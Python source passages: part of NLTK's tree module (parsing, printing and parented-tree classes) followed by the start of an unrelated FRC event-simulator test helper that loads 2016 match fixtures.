:type brackets: str (length=2)
:param brackets: The bracket characters used to mark the
beginning and end of trees and subtrees.
:type read_node: function
:type read_leaf: function
:param read_node, read_leaf: If specified, these functions
are applied to the substrings of ``s`` corresponding to
nodes and leaves (respectively) to obtain the values for
those nodes and leaves. They should have the following
signature:
read_node(str) -> value
For example, these functions could be used to process nodes
and leaves whose values should be some type other than
string (such as ``FeatStruct``).
Note that by default, node strings and leaf strings are
delimited by whitespace and brackets; to override this
default, use the ``node_pattern`` and ``leaf_pattern``
arguments.
:type node_pattern: str
:type leaf_pattern: str
:param node_pattern, leaf_pattern: Regular expression patterns
used to find node and leaf substrings in ``s``. By
default, both nodes patterns are defined to match any
sequence of non-whitespace non-bracket characters.
:type remove_empty_top_bracketing: bool
:param remove_empty_top_bracketing: If the resulting tree has
an empty node label, and is length one, then return its
single child instead. This is useful for treebank trees,
which sometimes contain an extra level of bracketing.
:return: A tree corresponding to the string representation ``s``.
If this class method is called using a subclass of Tree,
then it will return a tree of that type.
:rtype: Tree
"""
if not isinstance(brackets, string_types) or len(brackets) != 2:
raise TypeError('brackets must be a length-2 string')
if re.search('\s', brackets):
raise TypeError('whitespace brackets not allowed')
# Construct a regexp that will tokenize the string.
open_b, close_b = brackets
open_pattern, close_pattern = (re.escape(open_b), re.escape(close_b))
if node_pattern is None:
node_pattern = '[^\s%s%s]+' % (open_pattern, close_pattern)
if leaf_pattern is None:
leaf_pattern = '[^\s%s%s]+' % (open_pattern, close_pattern)
token_re = re.compile('%s\s*(%s)?|%s|(%s)' % (
open_pattern, node_pattern, close_pattern, leaf_pattern))
# Walk through each token, updating a stack of trees.
stack = [(None, [])] # list of (node, children) tuples
for match in token_re.finditer(s):
token = match.group()
# Beginning of a tree/subtree
if token[0] == open_b:
if len(stack) == 1 and len(stack[0][1]) > 0:
cls._parse_error(s, match, 'end-of-string')
label = token[1:].lstrip()
if read_node is not None: label = read_node(label)
stack.append((label, []))
# End of a tree/subtree
elif token == close_b:
if len(stack) == 1:
if len(stack[0][1]) == 0:
cls._parse_error(s, match, open_b)
else:
cls._parse_error(s, match, 'end-of-string')
label, children = stack.pop()
stack[-1][1].append(cls(label, children))
# Leaf node
else:
if len(stack) == 1:
cls._parse_error(s, match, open_b)
if read_leaf is not None: token = read_leaf(token)
stack[-1][1].append(token)
# check that we got exactly one complete tree.
if len(stack) > 1:
cls._parse_error(s, 'end-of-string', close_b)
elif len(stack[0][1]) == 0:
cls._parse_error(s, 'end-of-string', open_b)
else:
assert stack[0][0] is None
assert len(stack[0][1]) == 1
tree = stack[0][1][0]
# If the tree has an extra level with node='', then get rid of
# it. E.g.: "((S (NP ...) (VP ...)))"
if remove_empty_top_bracketing and tree._label == '' and len(tree) == 1:
tree = tree[0]
# return the tree.
return tree
@classmethod
def _parse_error(cls, s, match, expecting):
"""
Display a friendly error message when parsing a tree string fails.
:param s: The string we're parsing.
:param match: regexp match of the problem token.
:param expecting: what we expected to see instead.
"""
# Construct a basic error message
if match == 'end-of-string':
pos, token = len(s), 'end-of-string'
else:
pos, token = match.start(), match.group()
msg = '%s.read(): expected %r but got %r\n%sat index %d.' % (
cls.__name__, expecting, token, ' '*12, pos)
# Add a display showing the error token itsels:
s = s.replace('\n', ' ').replace('\t', ' ')
offset = pos
if len(s) > pos+10:
s = s[:pos+10]+'...'
if pos > 10:
s = '...'+s[pos-10:]
offset = 13
msg += '\n%s"%s"\n%s^' % (' '*16, s, ' '*(17+offset))
raise ValueError(msg)
#////////////////////////////////////////////////////////////
# Visualization & String Representation
#////////////////////////////////////////////////////////////
def draw(self):
"""
Open a new window containing a graphical diagram of this tree.
"""
from nltk.draw.tree import draw_trees
draw_trees(self)
def pretty_print(self, sentence=None, highlight=(), stream=None, **kwargs):
"""
Pretty-print this tree as ASCII or Unicode art.
For explanation of the arguments, see the documentation for
`nltk.treeprettyprinter.TreePrettyPrinter`.
"""
from nltk.treeprettyprinter import TreePrettyPrinter
print(TreePrettyPrinter(self, sentence, highlight).text(**kwargs),
file=stream)
def __repr__(self):
childstr = ", ".join(unicode_repr(c) for c in self)
return '%s(%s, [%s])' % (type(self).__name__, unicode_repr(self._label), childstr)
def _repr_png_(self):
"""
Draws and outputs in PNG for ipython.
PNG is used instead of PDF, since it can be displayed in the qt console and
has wider browser support.
"""
import os
import base64
import subprocess
import tempfile
from nltk.draw.tree import tree_to_treesegment
from nltk.draw.util import CanvasFrame
from nltk.internals import find_binary
_canvas_frame = CanvasFrame()
widget = tree_to_treesegment(_canvas_frame.canvas(), self)
_canvas_frame.add_widget(widget)
x, y, w, h = widget.bbox()
# print_to_file uses scrollregion to set the width and height of the pdf.
_canvas_frame.canvas()['scrollregion'] = (0, 0, w, h)
with tempfile.NamedTemporaryFile() as file:
in_path = '{0:}.ps'.format(file.name)
out_path = '{0:}.png'.format(file.name)
_canvas_frame.print_to_file(in_path)
_canvas_frame.destroy_widget(widget)
subprocess.call([find_binary('gs', binary_names=['gswin32c.exe', 'gswin64c.exe'], env_vars=['PATH'], verbose=False)] +
'-q -dEPSCrop -sDEVICE=png16m -r90 -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -dSAFER -dBATCH -dNOPAUSE -sOutputFile={0:} {1:}'
.format(out_path, in_path).split())
with open(out_path, 'rb') as sr:
res = sr.read()
os.remove(in_path)
os.remove(out_path)
return base64.b64encode(res).decode()
def __str__(self):
return self.pformat()
def pprint(self, **kwargs):
"""
Print a string representation of this Tree to 'stream'
"""
if "stream" in kwargs:
stream = kwargs["stream"]
del kwargs["stream"]
else:
stream = None
print(self.pformat(**kwargs), file=stream)
def pformat(self, margin=70, indent=0, nodesep='', parens='()', quotes=False):
"""
:return: A pretty-printed string representation of this tree.
:rtype: str
:param margin: The right margin at which to do line-wrapping.
:type margin: int
:param indent: The indentation level at which printing
begins. This number is used to decide how far to indent
subsequent lines.
:type indent: int
:param nodesep: A string that is used to separate the node
from the children. E.g., the default value ``':'`` gives
trees like ``(S: (NP: I) (VP: (V: saw) (NP: it)))``.
"""
# Try writing it on one line.
s = self._pformat_flat(nodesep, parens, quotes)
if len(s) + indent < margin:
return s
# If it doesn't fit on one line, then write it on multi-lines.
if isinstance(self._label, string_types):
s = '%s%s%s' % (parens[0], self._label, nodesep)
else:
s = '%s%s%s' % (parens[0], unicode_repr(self._label), nodesep)
for child in self:
if isinstance(child, Tree):
s += '\n'+' '*(indent+2)+child.pformat(margin, indent+2,
nodesep, parens, quotes)
elif isinstance(child, tuple):
s += '\n'+' '*(indent+2)+ "/".join(child)
elif isinstance(child, string_types) and not quotes:
s += '\n'+' '*(indent+2)+ '%s' % child
else:
s += '\n'+' '*(indent+2)+ unicode_repr(child)
return s+parens[1]
def pformat_latex_qtree(self):
r"""
Returns a representation of the tree compatible with the
LaTeX qtree package. This consists of the string ``\Tree``
followed by the tree represented in bracketed notation.
For example, the following result was generated from a parse tree of
the sentence ``The announcement astounded us``::
\Tree [.I'' [.N'' [.D The ] [.N' [.N announcement ] ] ]
[.I' [.V'' [.V' [.V astounded ] [.N'' [.N' [.N us ] ] ] ] ] ] ]
See http://www.ling.upenn.edu/advice/latex.html for the LaTeX
style file for the qtree package.
:return: A latex qtree representation of this tree.
:rtype: str
"""
reserved_chars = re.compile('([#\$%&~_\{\}])')
pformat = self.pformat(indent=6, nodesep='', parens=('[.', ' ]'))
return r'\Tree ' + re.sub(reserved_chars, r'\\\1', pformat)
def _pformat_flat(self, nodesep, parens, quotes):
childstrs = []
for child in self:
if isinstance(child, Tree):
childstrs.append(child._pformat_flat(nodesep, parens, quotes))
elif isinstance(child, tuple):
childstrs.append("/".join(child))
elif isinstance(child, string_types) and not quotes:
childstrs.append('%s' % child)
else:
childstrs.append(unicode_repr(child))
if isinstance(self._label, string_types):
return '%s%s%s %s%s' % (parens[0], self._label, nodesep,
" ".join(childstrs), parens[1])
else:
return '%s%s%s %s%s' % (parens[0], unicode_repr(self._label), nodesep,
" ".join(childstrs), parens[1])
class ImmutableTree(Tree):
def __init__(self, node, children=None):
super(ImmutableTree, self).__init__(node, children)
# Precompute our hash value. This ensures that we're really
# immutable. It also means we only have to calculate it once.
try:
self._hash = hash((self._label, tuple(self)))
except (TypeError, ValueError):
raise ValueError("%s: node value and children "
"must be immutable" % type(self).__name__)
def __setitem__(self, index, value):
raise ValueError('%s may not be modified' % type(self).__name__)
def __setslice__(self, i, j, value):
raise ValueError('%s may not be modified' % type(self).__name__)
def __delitem__(self, index):
raise ValueError('%s may not be modified' % type(self).__name__)
def __delslice__(self, i, j):
raise ValueError('%s may not be modified' % type(self).__name__)
def __iadd__(self, other):
raise ValueError('%s may not be modified' % type(self).__name__)
def __imul__(self, other):
raise ValueError('%s may not be modified' % type(self).__name__)
def append(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def extend(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def pop(self, v=None):
raise ValueError('%s may not be modified' % type(self).__name__)
def remove(self, v):
raise ValueError('%s may not be modified' % type(self).__name__)
def reverse(self):
raise ValueError('%s may not be modified' % type(self).__name__)
def sort(self):
raise ValueError('%s may not be modified' % type(self).__name__)
def __hash__(self):
return self._hash
def set_label(self, value):
"""
Set the node label. This will only succeed the first time the
node label is set, which should occur in ImmutableTree.__init__().
"""
if hasattr(self, '_label'):
raise ValueError('%s may not be modified' % type(self).__name__)
self._label = value
class AbstractParentedTree(Tree):
"""
An abstract base class for a ``Tree`` that automatically maintains
pointers to parent nodes. These parent pointers are updated
whenever any change is made to a tree's structure. Two subclasses
are currently defined:
- ``ParentedTree`` is used for tree structures where each subtree
has at most one parent. This class should be used in cases
where there is no"sharing" of subtrees.
- ``MultiParentedTree`` is used for tree structures where a
subtree may have zero or more parents. This class should be
used in cases where subtrees may be shared.
Subclassing
===========
The ``AbstractParentedTree`` class redefines all operations that
modify a tree's structure to call two methods, which are used by
subclasses to update parent information:
- ``_setparent()`` is called whenever a new child is added.
- ``_delparent()`` is called whenever a child is removed.
"""
def __init__(self, node, children=None):
super(AbstractParentedTree, self).__init__(node, children)
# If children is None, the tree is read from node, and
# all parents will be set during parsing.
if children is not None:
# Otherwise we have to set the parent of the children.
# Iterate over self, and *not* children, because children
# might be an iterator.
for i, child in enumerate(self):
if isinstance(child, Tree):
self._setparent(child, i, dry_run=True)
for i, child in enumerate(self):
if isinstance(child, Tree):
self._setparent(child, i)
#////////////////////////////////////////////////////////////
# Parent management
#////////////////////////////////////////////////////////////
def _setparent(self, child, index, dry_run=False):
"""
Update the parent pointer of ``child`` to point to ``self``. This
method is only called if the type of ``child`` is ``Tree``;
i.e., it is not called when adding a leaf to a tree. This method
is always called before the child is actually added to the
child list of ``self``.
:type child: Tree
:type index: int
:param index: The index of ``child`` in ``self``.
:raise TypeError: If ``child`` is a tree with an impropriate
type. Typically, if ``child`` is a tree, then its type needs
to match the type of ``self``. This prevents mixing of
different tree types (single-parented, multi-parented, and
non-parented).
:param dry_run: If true, the don't actually set the child's
parent pointer; just check for any error conditions, and
raise an exception if one is found.
"""
raise NotImplementedError()
def _delparent(self, child, index):
"""
Update the parent pointer of ``child`` to not point to self. This
method is only called if the type of ``child`` is ``Tree``; i.e., it
is not called when removing a leaf from a tree. This method
is always called before the child is actually removed from the
child list of ``self``.
:type child: Tree
:type index: int
:param index: The index of ``child`` in ``self``.
"""
raise NotImplementedError()
#////////////////////////////////////////////////////////////
# Methods that add/remove children
#////////////////////////////////////////////////////////////
# Every method that adds or removes a child must make
# appropriate calls to _setparent() and _delparent().
def __delitem__(self, index):
# del ptree[start:stop]
if isinstance(index, slice):
start, stop, step = slice_bounds(self, index, allow_step=True)
# Clear all the children pointers.
for i in range(start, stop, step):
if isinstance(self[i], Tree):
self._delparent(self[i], i)
# Delete the children from our child list.
super(AbstractParentedTree, self).__delitem__(index)
# del ptree[i]
elif isinstance(index, int):
if index < 0: index += len(self)
if index < 0: raise IndexError('index out of range')
# Clear the child's parent pointer.
if isinstance(self[index], Tree):
self._delparent(self[index], index)
# Remove the child from our child list.
super(AbstractParentedTree, self).__delitem__(index)
elif isinstance(index, (list, tuple)):
# del ptree[()]
if len(index) == 0:
raise IndexError('The tree position () may not be deleted.')
# del ptree[(i,)]
elif len(index) == 1:
del self[index[0]]
# del ptree[i1, i2, i3]
else:
del self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __setitem__(self, index, value):
# ptree[start:stop] = value
if isinstance(index, slice):
start, stop, step = slice_bounds(self, index, allow_step=True)
# make a copy of value, in case it's an iterator
if not isinstance(value, (list, tuple)):
value = list(value)
# Check for any error conditions, so we can avoid ending
# up in an inconsistent state if an error does occur.
for i, child in enumerate(value):
if isinstance(child, Tree):
self._setparent(child, start + i*step, dry_run=True)
# clear the child pointers of all parents we're removing
for i in range(start, stop, step):
if isinstance(self[i], Tree):
self._delparent(self[i], i)
# set the child pointers of the new children. We do this
# after clearing *all* child pointers, in case we're e.g.
# reversing the elements in a tree.
for i, child in enumerate(value):
if isinstance(child, Tree):
self._setparent(child, start + i*step)
# finally, update the content of the child list itself.
super(AbstractParentedTree, self).__setitem__(index, value)
# ptree[i] = value
elif isinstance(index, int):
if index < 0: index += len(self)
if index < 0: raise IndexError('index out of range')
# if the value is not changing, do nothing.
if value is self[index]:
return
# Set the new child's parent pointer.
if isinstance(value, Tree):
self._setparent(value, index)
# Remove the old child's parent pointer
if isinstance(self[index], Tree):
self._delparent(self[index], index)
# Update our child list.
super(AbstractParentedTree, self).__setitem__(index, value)
elif isinstance(index, (list, tuple)):
# ptree[()] = value
if len(index) == 0:
raise IndexError('The tree position () may not be assigned to.')
# ptree[(i,)] = value
elif len(index) == 1:
self[index[0]] = value
# ptree[i1, i2, i3] = value
else:
self[index[0]][index[1:]] = value
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def append(self, child):
if isinstance(child, Tree):
self._setparent(child, len(self))
super(AbstractParentedTree, self).append(child)
def extend(self, children):
for child in children:
if isinstance(child, Tree):
self._setparent(child, len(self))
super(AbstractParentedTree, self).append(child)
def insert(self, index, child):
# Handle negative indexes. Note that if index < -len(self),
# we do *not* raise an IndexError, unlike __getitem__. This
# is done for consistency with list.__getitem__ and list.index.
if index < 0: index += len(self)
if index < 0: index = 0
# Set the child's parent, and update our child list.
if isinstance(child, Tree):
self._setparent(child, index)
super(AbstractParentedTree, self).insert(index, child)
def pop(self, index=-1):
if index < 0: index += len(self)
if index < 0: raise IndexError('index out of range')
if isinstance(self[index], Tree):
self._delparent(self[index], index)
return super(AbstractParentedTree, self).pop(index)
# n.b.: like `list`, this is done by equality, not identity!
# To remove a specific child, use del ptree[i].
def remove(self, child):
index = self.index(child)
if isinstance(self[index], Tree):
self._delparent(self[index], index)
super(AbstractParentedTree, self).remove(child)
# We need to implement __getslice__ and friends, even though
# they're deprecated, because otherwise list.__getslice__ will get
# called (since we're subclassing from list). Just delegate to
# __getitem__ etc., but use max(0, start) and max(0, stop) because
# because negative indices are already handled *before*
# __getslice__ is called; and we don't want to double-count them.
if hasattr(list, '__getslice__'):
def __getslice__(self, start, stop):
return self.__getitem__(slice(max(0, start), max(0, stop)))
def __delslice__(self, start, stop):
return self.__delitem__(slice(max(0, start), max(0, stop)))
def __setslice__(self, start, stop, value):
return self.__setitem__(slice(max(0, start), max(0, stop)), value)
class ParentedTree(AbstractParentedTree):
"""
A ``Tree`` that automatically maintains parent pointers for
single-parented trees. The following are methods for querying
the structure of a parented tree: ``parent``, ``parent_index``,
``left_sibling``, ``right_sibling``, ``root``, ``treeposition``.
Each ``ParentedTree`` may have at most one parent. In
particular, subtrees may not be shared. Any attempt to reuse a
single ``ParentedTree`` as a child of more than one parent (or
as multiple children of the same parent) will cause a
``ValueError`` exception to be raised.
``ParentedTrees`` should never be used in the same tree as ``Trees``
or ``MultiParentedTrees``. Mixing tree implementations may result
in incorrect parent pointers and in ``TypeError`` exceptions.
"""
def __init__(self, node, children=None):
self._parent = None
"""The parent of this Tree, or None if it has no parent."""
super(ParentedTree, self).__init__(node, children)
if children is None:
# If children is None, the tree is read from node.
# After parsing, the parent of the immediate children
# will point to an intermediate tree, not self.
# We fix this by brute force:
for i, child in enumerate(self):
if isinstance(child, Tree):
child._parent = None
self._setparent(child, i)
def _frozen_class(self): return ImmutableParentedTree
#/////////////////////////////////////////////////////////////////
# Methods
#/////////////////////////////////////////////////////////////////
def parent(self):
"""The parent of this tree, or None if it has no parent."""
return self._parent
def parent_index(self):
"""
The index of this tree in its parent. I.e.,
``ptree.parent()[ptree.parent_index()] is ptree``. Note that
``ptree.parent_index()`` is not necessarily equal to
``ptree.parent.index(ptree)``, since the ``index()`` method
returns the first child that is equal to its argument.
"""
if self._parent is None: return None
for i, child in enumerate(self._parent):
if child is self: return i
assert False, 'expected to find self in self._parent!'
def left_sibling(self):
"""The left sibling of this tree, or None if it has none."""
parent_index = self.parent_index()
if self._parent and parent_index > 0:
return self._parent[parent_index-1]
return None # no left sibling
def right_sibling(self):
"""The right sibling of this tree, or None if it has none."""
parent_index = self.parent_index()
if self._parent and parent_index < (len(self._parent)-1):
return self._parent[parent_index+1]
return None # no right sibling
def root(self):
"""
The root of this tree. I.e., the unique ancestor of this tree
whose parent is None. If ``ptree.parent()`` is None, then
``ptree`` is its own root.
"""
root = self
while root.parent() is not None:
root = root.parent()
return root
def treeposition(self):
"""
The tree position of this tree, relative to the root of the
tree. I.e., ``ptree.root[ptree.treeposition] is ptree``.
"""
if self.parent() is None:
return ()
else:
return self.parent().treeposition() + (self.parent_index(),)
#/////////////////////////////////////////////////////////////////
# Parent Management
#/////////////////////////////////////////////////////////////////
def _delparent(self, child, index):
# Sanity checks
assert isinstance(child, ParentedTree)
assert self[index] is child
assert child._parent is self
# Delete child's parent pointer.
child._parent = None
def _setparent(self, child, index, dry_run=False):
# If the child's type is incorrect, then complain.
if not isinstance(child, ParentedTree):
raise TypeError('Can not insert a non-ParentedTree '+
'into a ParentedTree')
# If child already has a parent, then complain.
if child._parent is not None:
raise ValueError('Can not insert a subtree that already '
'has a parent.')
# Set child's parent pointer & index.
if not dry_run:
child._parent = self
class MultiParentedTree(AbstractParentedTree):
"""
A ``Tree`` that automatically maintains parent pointers for
multi-parented trees. The following are methods for querying the
structure of a multi-parented tree: ``parents()``, ``parent_indices()``,
``left_siblings()``, ``right_siblings()``, ``roots``, ``treepositions``.
Each ``MultiParentedTree`` may have zero or more parents. In
particular, subtrees may be shared. If a single
``MultiParentedTree`` is used as multiple children of the same
parent, then that parent will appear multiple times in its
``parents()`` method.
``MultiParentedTrees`` should never be used in the same tree as
``Trees`` or ``ParentedTrees``. Mixing tree implementations may
result in incorrect parent pointers and in ``TypeError`` exceptions.
"""
def __init__(self, node, children=None):
self._parents = []
"""A list of this tree's parents. This list should not
contain duplicates, even if a parent contains this tree
multiple times."""
super(MultiParentedTree, self).__init__(node, children)
if children is None:
# If children is None, the tree is read from node.
# After parsing, the parent(s) of the immediate children
# will point to an intermediate tree, not self.
# We fix this by brute force:
for i, child in enumerate(self):
if isinstance(child, Tree):
child._parents = []
self._setparent(child, i)
def _frozen_class(self): return ImmutableMultiParentedTree
#/////////////////////////////////////////////////////////////////
# Methods
#/////////////////////////////////////////////////////////////////
def parents(self):
"""
The set of parents of this tree. If this tree has no parents,
then ``parents`` is the empty set. To check if a tree is used
as multiple children of the same parent, use the
``parent_indices()`` method.
:type: list(MultiParentedTree)
"""
return list(self._parents)
def left_siblings(self):
"""
A list of all left siblings of this tree, in any of its parent
trees. A tree may be its own left sibling if it is used as
multiple contiguous children of the same parent. A tree may
appear multiple times in this list if it is the left sibling
of this tree with respect to multiple parents.
:type: list(MultiParentedTree)
"""
return [parent[index-1]
for (parent, index) in self._get_parent_indices()
if index > 0]
def right_siblings(self):
"""
A list of all right siblings of this tree, in any of its parent
trees. A tree may be its own right sibling if it is used as
multiple contiguous children of the same parent. A tree may
appear multiple times in this list if it is the right sibling
of this tree with respect to multiple parents.
:type: list(MultiParentedTree)
"""
return [parent[index+1]
for (parent, index) in self._get_parent_indices()
if index < (len(parent)-1)]
def _get_parent_indices(self):
return [(parent, index)
for parent in self._parents
for index, child in enumerate(parent)
if child is self]
def roots(self):
"""
The set of all roots of this tree. This set is formed by
tracing all possible parent paths until trees with no parents
are found.
:type: list(MultiParentedTree)
"""
return list(self._get_roots_helper({}).values())
def _get_roots_helper(self, result):
if self._parents:
for parent in self._parents:
parent._get_roots_helper(result)
else:
result[id(self)] = self
return result
def parent_indices(self, parent):
"""
Return a list of the indices where this tree occurs as a child
of ``parent``. If this child does not occur as a child of
``parent``, then the empty list is returned. The following is
always true::
for parent_index in ptree.parent_indices(parent):
parent[parent_index] is ptree
"""
if parent not in self._parents: return []
else: return [index for (index, child) in enumerate(parent)
if child is self]
def treepositions(self, root):
"""
Return a list of all tree positions that can be used to reach
this multi-parented tree starting from ``root``. I.e., the
following is always true::
for treepos in ptree.treepositions(root):
root[treepos] is ptree
"""
if self is root:
return [()]
else:
return [treepos+(index,)
for parent in self._parents
for treepos in parent.treepositions(root)
for (index, child) in enumerate(parent) if child is self]
#/////////////////////////////////////////////////////////////////
# Parent Management
#/////////////////////////////////////////////////////////////////
def _delparent(self, child, index):
# Sanity checks
assert isinstance(child, MultiParentedTree)
assert self[index] is child
assert len([p for p in child._parents if p is self]) == 1
# If the only copy of child in self is at index, then delete
# self from child's parent list.
for i, c in enumerate(self):
if c is child and i != index: break
else:
child._parents.remove(self)
def _setparent(self, child, index, dry_run=False):
# If the child's type is incorrect, then complain.
if not isinstance(child, MultiParentedTree):
raise TypeError('Can not insert a non-MultiParentedTree '+
'into a MultiParentedTree')
# Add self as a parent pointer if it's not already listed.
if not dry_run:
for parent in child._parents:
if parent is self: break
else:
child._parents.append(self)
class ImmutableParentedTree(ImmutableTree, ParentedTree):
pass
class ImmutableMultiParentedTree(ImmutableTree, MultiParentedTree):
pass
@python_2_unicode_compatible
class ProbabilisticTree(Tree, ProbabilisticMixIn):
def __init__(self, node, children=None, **prob_kwargs):
Tree.__init__(self, node, children)
ProbabilisticMixIn.__init__(self, **prob_kwargs)
# We have to patch up these methods to make them work right:
def _frozen_class(self): return ImmutableProbabilisticTree
def __repr__(self):
return '%s (p=%r)' % (Tree.unicode_repr(self), self.prob())
def __str__(self):
return '%s (p=%.6g)' % (self.pformat(margin=60), self.prob())
def copy(self, deep=False):
if not deep: return type(self)(self._label, self, prob=self.prob())
else: return type(self).convert(self)
@classmethod
def convert(cls, val):
if isinstance(val, Tree):
children = [cls.convert(child) for child in val]
if isinstance(val, ProbabilisticMixIn):
return cls(val._label, children, prob=val.prob())
else:
return cls(val._label, children, prob=1.0)
else:
return val
def __eq__(self, other):
return (self.__class__ is other.__class__ and
(self._label, list(self), self.prob()) ==
(other._label, list(other), other.prob()))
def __lt__(self, other):
if not isinstance(other, Tree):
raise_unorderable_types("<", self, other)
if self.__class__ is other.__class__:
return ((self._label, list(self), self.prob()) <
(other._label, list(other), other.prob()))
else:
return self.__class__.__name__ < other.__class__.__name__
@python_2_unicode_compatible
class ImmutableProbabilisticTree(ImmutableTree, ProbabilisticMixIn):
def __init__(self, node, children=None, **prob_kwargs):
ImmutableTree.__init__(self, node, children)
ProbabilisticMixIn.__init__(self, **prob_kwargs)
self._hash = hash((self._label, tuple(self), self.prob()))
# We have to patch up these methods to make them work right:
def _frozen_class(self): return ImmutableProbabilisticTree
def __repr__(self):
return '%s [%s]' % (Tree.unicode_repr(self), self.prob())
def __str__(self):
return '%s [%s]' % (self.pformat(margin=60), self.prob())
def copy(self, deep=False):
if not deep: return type(self)(self._label, self, prob=self.prob())
else: return type(self).convert(self)
@classmethod
def convert(cls, val):
if isinstance(val, Tree):
children = [cls.convert(child) for child in val]
if isinstance(val, ProbabilisticMixIn):
return cls(val._label, children, prob=val.prob())
else:
return cls(val._label, children, prob=1.0)
else:
return val
def _child_names(tree):
names = []
for child in tree:
if isinstance(child, Tree):
names.append(Nonterminal(child._label))
else:
names.append(child)
return names
def bracket_parse(s):
"""
Use Tree.read(s, remove_empty_top_bracketing=True) instead.
"""
raise NameError("Use Tree.read(s, remove_empty_top_bracketing=True) instead.")
def sinica_parse(s):
"""
Parse a Sinica Treebank string and return a tree. Trees are represented as nested brackettings,
as shown in the following example (X represents a Chinese character):
S(goal:NP(Head:Nep:XX)|theme:NP(Head:Nhaa:X)|quantity:Dab:X|Head:VL2:X)#0(PERIODCATEGORY)
:return: A tree corresponding to the string representation.
:rtype: Tree
:param s: The string to be converted
:type s: str
"""
tokens = re.split(r'([()| ])', s)
for i in range(len(tokens)):
if tokens[i] == '(':
tokens[i-1], tokens[i] = tokens[i], tokens[i-1] # pull nonterminal inside parens
elif ':' in tokens[i]:
fields = tokens[i].split(':')
if len(fields) == 2: # non-terminal
tokens[i] = fields[1]
else:
tokens[i] = "(" + fields[-2] + " " + fields[-1] + ")"
elif tokens[i] == '|':
tokens[i] = ''
treebank_string = " ".join(tokens)
return Tree.fromstring(treebank_string, remove_empty_top_bracketing=True)
def demo():
"""
A demonstration showing how Trees and Trees can be
used. This demonstration creates a Tree, and loads a
Tree from the Treebank corpus,
and shows the results of calling several of their methods.
"""
from nltk import Tree, ProbabilisticTree
# Demonstrate tree parsing.
s = '(S (NP (DT the) (NN cat)) (VP (VBD ate) (NP (DT a) (NN cookie))))'
t = Tree.fromstring(s)
print("Convert bracketed string into tree:")
print(t)
print(t.__repr__())
print("Display tree properties:")
print(t.label()) # tree's constituent type
print(t[0]) # tree's first child
print(t[1]) # tree's second child
print(t.height())
print(t.leaves())
print(t[1])
print(t[1,1])
print(t[1,1,0])
# Demonstrate tree modification.
the_cat = t[0]
the_cat.insert(1, Tree.fromstring('(JJ big)'))
print("Tree modification:")
print(t)
t[1,1,1] = Tree.fromstring('(NN cake)')
print(t)
print()
# Tree transforms
print("Collapse unary:")
t.collapse_unary()
print(t)
print("Chomsky normal form:")
t.chomsky_normal_form()
print(t)
print()
# Demonstrate probabilistic trees.
pt = ProbabilisticTree('x', ['y', 'z'], prob=0.5)
print("Probabilistic Tree:")
print(pt)
print()
# Demonstrate parsing of treebank output format.
t = Tree.fromstring(t.pformat())
print("Convert tree to bracketed string and back again:")
print(t)
print()
# Demonstrate LaTeX output
print("LaTeX output:")
print(t.pformat_latex_qtree())
print()
# Demonstrate Productions
print("Production output:")
print(t.productions())
print()
# Demonstrate tree nodes containing objects other than strings
t.set_label(('test', 3))
print(t)
__all__ = ['ImmutableProbabilisticTree', 'ImmutableTree', 'ProbabilisticMixIn',
'ProbabilisticTree', 'Tree', 'bracket_parse',
'sinica_parse', 'ParentedTree', 'MultiParentedTree',
'ImmutableParentedTree', 'ImmutableMultiParentedTree']
|
from collections import defaultdict
import copy
import datetime
import json
from appengine_fixture_loader.loader import load_fixture
from google.appengine.ext import ndb
from helpers.event_details_manipulator import EventDetailsManipulator
from helpers.match_helper import MatchHelper
from helpers.match_manipulator import MatchManipulator
from models.event import Event
from models.event_details import EventDetails
from models.match import Match
class EventSimulator(object):
"""
Steps through an event in time. At step = 0, only the Event exists:
(step 0) Add all unplayed qual matches
(step 1, substep n) Add results of each of the n qual matches +
rankings being updated (if has_event_details)
(step 2) Add alliance selections (if has_event_details)
(step 3) Add unplayed QF matches
(step 4, substep n) Add results of each of the n QF matches +
update SF matches with advancing alliances (if not batch_advance) +
update alliance selection backups (if has_event_details)
(step 5) Add unplayed SF matches (if batch_advance)
(step 6, substep n) Add results of each of the n SF matches +
update F matches with advancing alliances (if not batch_advance) +
update alliance selection backups (if has_event_details)
(step 7) Add unplayed F matches (if batch_advance)
(step 8, substep n) Add results of each of the n F matches +
update alliance selection backups (if has_event_details)
"""
def __init__(self, has_event_details=True, batch_advance=False):
self._step = 0
self._substep = 0
# whether to update rankings and alliance selections
self._has_event_details = has_event_details
# whether to update next playoff level all at once, or as winners are determined
self._batch_advance = batch_advance
# Load and save complete data
load_fixture('test_data/fixtures/2016nytr_event_team_status.json',
kind={'EventDetails': EventDetails, 'Event': Event, 'Match': Match},
post_processor=self._event_key_adder)
event = Event.get_by_id('2016nytr')
# Add 3rd matches that never got played
unplayed_matches = [
Match(
id='2016nytr_qf1m3',
year=2016,
event=event.key,
comp_level='qf',
set_number=1,
match_number=3,
alliances_json=json.dumps({
'red': {
'teams': ['frc3990', 'frc359', 'frc4508'],
'score': -1,
},
'blue': {
'teams': ['frc3044', 'frc4930', 'frc4481'],
'score': -1,
}
}),
time=datetime.datetime(2016, 3, 19, 18, 34),
),
Match(
id='2016nytr_qf3m3',
year=2016,
event=event.key,
comp_level='qf',
set_number=3,
match_number=3,
alliances_json=json.dumps({
'red': {
'teams': ['frc20', 'frc5254', 'frc229'],
'score': -1,
},
'blue': {
'teams': ['frc3003', 'frc358', 'frc527'],
'score': -1,
}
}),
time=datetime.datetime(2016, 3, 19, 18, 48),
),
Match(
id='2016nytr_sf1m3',
year=2016,
event=event.key,
comp_level='sf',
set_number=1,
match_number=3,
alliances_json=json.dumps({
'red': {
'teams': ['frc3990', 'frc359', 'frc4508'],
'score': -1,
},
'blue': {
'teams': ['frc5240', 'frc3419', 'frc663'],
'score': -1,
}
}),
time=datetime.datetime(2016, 3, 19, 19, 42),
)
]
self._event_details = event.details
self._alliance_selections_without_backup = copy.deepcopy(event.details.alliance_selections)
self._alliance_selections_without_backup[1]['backup'] = None
self._played_matches = MatchHelper.organizeMatches(event.matches)
self._all_matches = MatchHelper.organizeMatches(event.matches + unplayed_matches)
# Delete data
event.details.key.delete()
ndb.delete_multi([match.key for match in event.matches])
ndb.get_context().clear_cache()
# Used to keep track of non-batch advancement
self._advancement_alliances = defaultdict(dict)
def _event_key_adder(self, obj):
